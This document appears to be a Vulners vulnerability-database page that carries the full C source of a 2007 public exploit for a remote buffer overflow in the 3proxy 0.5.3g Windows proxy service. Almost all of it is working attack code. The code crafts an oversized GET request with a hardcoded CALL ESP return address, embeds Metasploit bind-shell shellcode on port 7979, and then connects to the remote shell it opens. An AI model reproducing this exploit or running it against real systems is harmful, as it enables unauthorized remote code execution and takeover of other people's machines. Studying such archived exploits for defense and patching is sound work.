Vulners
Lucene search
3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (win32)
/*[ 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit. ]*
* *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* compile: *
* gcc x3proxy-win32.c -o x3proxy-win32 *
* *
* syntax: *
* ./x3proxy-win32 [-pr] -h host *
* *
* sumus homepage/url: *
* http://3proxy.ru/ *
* *
* 3Proxy tiny free proxy server previously known as 3[APA3A] tiny *
* freeware proxy. *
* *
* I just saw a (gentoo) advisory, and got curious how easy it *
* would be to exploit this. The vulnerability is fairly *
* trival(win32 version): *
* *
* ----------------------------------------------------------------- *
* GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n *
* Host: [FILLERx999]\n\n *
* ----------------------------------------------------------------- *
* *
* The length of "Host: [FILLER]" is exactly how many bytes past the *
* buffer boundary it will go, if it's not there it won't overflow. *
* The vulnerability can be found in proxy.c in the logurl() *
* function. (buf[LINESIZE]) *
* *
* To find the address needed for the EIP overwrite, use *
* findjmp.exe(any of the call/jmp addresses found will work): *
* *
* ----------------------------------------------------------------- *
* C:\>findjmp.exe kernel32.dll esp *
* Reg: esp *
* Scanning kernel32.dll for code usable with the esp register *
* 0x7C81518B call esp *
* 0x7C8369D8 call esp *
* Finished Scanning kernel32.dll for code usable with the esp reg$ *
* Found 2 usable addresses *
*********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE 4096
#define TIMEOUT 10
#define DFL_PORT 3128
#define SPORT 7979
/* (WinXP home SP2) */
/* findjmp.exe kernel32.dll esp */
/* ... */
/* 0x7C81518B call esp */
/* ... */
#define DFL_RETADDR 0x7C81518B
/* globals. */
/* win32_bind - EXITFUNC=thread LPORT=7979 Size=344 */
/* Encoder=PexFnstenvSub http://metasploit.com */
static char x86_bind[]=
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b"
"\x76\x8d\x13\x83\xeb\xfc\xe2\xf4\xb7\x1c\x66\x5e\xa3\x8f\x72\xec"
"\xb4\x16\x06\x7f\x6f\x52\x06\x56\x77\xfd\xf1\x16\x33\x77\x62\x98"
"\x04\x6e\x06\x4c\x6b\x77\x66\x5a\xc0\x42\x06\x12\xa5\x47\x4d\x8a"
"\xe7\xf2\x4d\x67\x4c\xb7\x47\x1e\x4a\xb4\x66\xe7\x70\x22\xa9\x3b"
"\x3e\x93\x06\x4c\x6f\x77\x66\x75\xc0\x7a\xc6\x98\x14\x6a\x8c\xf8"
"\x48\x5a\x06\x9a\x27\x52\x91\x72\x88\x47\x56\x77\xc0\x35\xbd\x98"
"\x0b\x7a\x06\x63\x57\xdb\x06\x53\x43\x28\xe5\x9d\x05\x78\x61\x43"
"\xb4\xa0\xeb\x40\x2d\x1e\xbe\x21\x23\x01\xfe\x21\x14\x22\x72\xc3"
"\x23\xbd\x60\xef\x70\x26\x72\xc5\x14\xff\x68\x75\xca\x9b\x85\x11"
"\x1e\x1c\x8f\xec\x9b\x1e\x54\x1a\xbe\xdb\xda\xec\x9d\x25\xde\x40"
"\x18\x25\xce\x40\x08\x25\x72\xc3\x2d\x1e\x92\x38\x2d\x25\x04\xf2"
"\xde\x1e\x29\x09\x3b\xb1\xda\xec\x9d\x1c\x9d\x42\x1e\x89\x5d\x7b"
"\xef\xdb\xa3\xfa\x1c\x89\x5b\x40\x1e\x89\x5d\x7b\xae\x3f\x0b\x5a"
"\x1c\x89\x5b\x43\x1f\x22\xd8\xec\x9b\xe5\xe5\xf4\x32\xb0\xf4\x44"
"\xb4\xa0\xd8\xec\x9b\x10\xe7\x77\x2d\x1e\xee\x7e\xc2\x93\xe7\x43"
"\x12\x5f\x41\x9a\xac\x1c\xc9\x9a\xa9\x47\x4d\xe0\xe1\x88\xcf\x3e"
"\xb5\x34\xa1\x80\xc6\x0c\xb5\xb8\xe0\xdd\xe5\x61\xb5\xc5\x9b\xec"
"\x3e\x32\x72\xc5\x10\x21\xdf\x42\x1a\x27\xe7\x12\x1a\x27\xd8\x42"
"\xb4\xa6\xe5\xbe\x92\x73\x43\x40\xb4\xa0\xe7\xec\xb4\x41\x72\xc3"
"\xc0\x21\x71\x90\x8f\x12\x72\xc5\x19\x89\x5d\x7b\xa4\xb8\x6d\x73"
"\x18\x89\x5b\xec\x9b\x76\x8d\x13";
struct{
unsigned int addr;
char *host;
unsigned short port;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short proxy_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
printf("[*] 3proxy[v0.5.3g]: (win32 service) remote buffer overflo"
"w exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)"
"\n\n");
tbl.port=DFL_PORT;
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host)usage(argv[0]);
printf("[*] target: %s:%d\n",tbl.host,tbl.port);
printf("[*] return address($eip/\"CALL ESP\"): 0x%.8x\n",tbl.addr);
proxy_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: */
/* "GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n" */
/* "Host: [FILLERx999]\n\n" */
char *getbuf(unsigned int addr){
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);
strcpy(buf,"GET /");
memset(buf+5,'x',1064);
*(long *)&buf[1064+5]=addr;
memset(buf+strlen(buf),'\x90',32);
strcat(buf,x86_bind);
strcat(buf,"\nHost: ");
memset(buf+strlen(buf),'x',999);
strcat(buf,"\n\n");
return(buf);
}
/* connects to the vulnerable 3proxy server. */
unsigned short proxy_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("3proxy connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.\n",hostname,port);
sleep(1);
printf("[*] sending string:\n");
printf("[+] GET /[FILLERx1064][EIP/\"CALL ESP\"][NOPSx32]"
"[SHELLCODE]\\n\n");
printf("[+] Host: [FILLERx999]\\n\\n\n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf("[*] closing connection.\n\n");
close(sock);
return(0);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
/* process the bind shell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-pr] -h host\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -r <addr>\tdefine return/\"CALL ESP\" address. (0x%.8x)\n\n",tbl.addr);
exit(0);
}
// sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Apr 2007 00:00Current
7.1High risk
Vulners AI Score7.1